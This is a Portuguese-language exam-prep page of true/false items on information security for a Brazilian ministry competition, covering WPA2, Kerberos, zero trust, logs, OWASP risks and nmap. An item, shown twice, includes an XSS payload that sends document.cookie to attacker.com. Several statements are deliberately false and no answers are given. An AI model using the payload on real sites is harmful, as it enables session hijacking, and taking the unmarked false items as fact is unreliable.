Questões de Concurso
Comentadas para ministério da economia
Foram encontradas 741 questões
Resolva questões gratuitamente!
Junte-se a mais de 4 milhões de concurseiros!
A respeito de configurações de segurança para estações Windows 8, julgue o item subsequente.
O Windows Defender avisa quando um programa ou usuário
tenta alterar as configurações do computador.
Por padrão, o WPA2 usa o algoritmo de criptografia 3DES.
O WPA2 se divide em WPA2-personal e WPA2-enterprise: o primeiro fornece segurança por meio de senha; o segundo, por meio da autenticação de usuários mediante um servidor de autenticação.
No Kerberos, o tíquete de concessão (TGT) possui carimbo de hora, mas é enviado em texto claro.
No passo básico de autenticação do Kerberos, o cliente se autentica no servidor de autenticação, que, por sua vez, encaminha o nome de usuário para um centro de distribuição de chaves.
Julgue o próximo item, a respeito de gerência de riscos.
Risco é o efeito da incerteza nos objetivos, sendo
normalmente expresso em termos de fontes de risco, eventos
potenciais, suas consequências e suas probabilidades.
Julgue o próximo item, a respeito de gerência de riscos.
Para gerenciar riscos, devem-se considerar os contextos
externo e interno da organização, salvo o comportamento
humano.
O modelo confiança zero estabelece que, depois de um usuário ser autenticado, devem-se fornecer a ele todos os acessos.
Uma rede de confiança zero pressupõe que haja invasores dentro e fora da rede, por isso nenhum usuário ou máquina deve ser automaticamente confiável.
O referido decreto estabelece que qualquer auditoria de segurança da informação deve ser autorizada pelo gestor de tecnologia da informação do órgão.
Cabe aos órgãos e às entidades da administração pública federal, em seu âmbito de atuação, analisar os resultados dos trabalhos de auditoria sobre a gestão de segurança da informação.
O prazo máximo de restrição de acesso a informações classificadas no grau ultrassecreto é de vinte e cinco anos.
É correto firmar que, a seguir, é ilustrado o conteúdo típico de um arquivo de log de um serviço de email, obtido por meio do comando more /var/log/maillog.
Aug 10 14:14:01 localhost sendmail[4768]: h7ALE1t04 763: [email protected], ctladdr=apache (48/48 ), delay=00:00:00, xdelay=00:00:00, mailer=esmtp, p ri=31300, relay=mx1.mail.yahoo.com. [64.157.4.78], d sn=2.0.0, stat=Sent (ok dirdel)
O registro do sistema operacional Windows consiste em um banco de dados com informações relativas ao hardware, ao software, a drivers, a perfis, a configurações, entre outras informações relevantes ao funcionamento do sistema.
O espaço existente entre os fins lógico e físico de um arquivo é denominado file slack, um tipo de desperdício presente em qualquer sistema de arquivos, com qualquer tamanho de bloco, pois dificilmente os arquivos terão tamanho com um valor múltiplo do tamanho do bloco.
Engenharia reversa consiste em descobrir a senha de um arquivo e(ou) sistema por meio de um processo de tentativa e erro.
Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.
><script>document.location=
'http://www.attacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>
Nesse caso, o risco de segurança da aplicação é a desserialização insegura.
Muitas aplicações web e APIs não protegem de forma
adequada dados sensíveis, como dados financeiros, de saúde
ou de identificação pessoal, por isso, para sua proteção, é
necessário classificar os dados processados, armazenados ou
transmitidos pela aplicação.
Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.
><script>document.location=
'http://www.attacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>
Nesse caso, o risco de segurança da aplicação é a desserialização insegura.
Limitar o número máximo de tentativas de autenticação
falhadas, ou atrasar progressivamente essa operação, e
registar todas as falhas e alertar os administradores quando
detectados ataques de teste exaustivo ou de força bruta são
formas de prevenir a quebra de autenticação.
Acerca de técnicas de ataque e tipos de vulnerabilidades, julgue o item a seguir.
Em uma máquina com o Ubuntu 16.04.6 LTS na qual esteja
instalado o servidor nginx 1.10.3 configurado com o valor
off atribuído à variável server_tokens, a execução do
comando nmap -sV localhost -p80 nessa máquina
gerará o resultado a seguir, relacionado à porta analisada.
80/tcp open http nginx 1.10.3 (Ubuntu)
Acerca de técnicas de ataque e tipos de vulnerabilidades, julgue o item a seguir.
Fingerprint é a fase do footprint que tem por objetivo a
identificação do endereço IP do host alvo.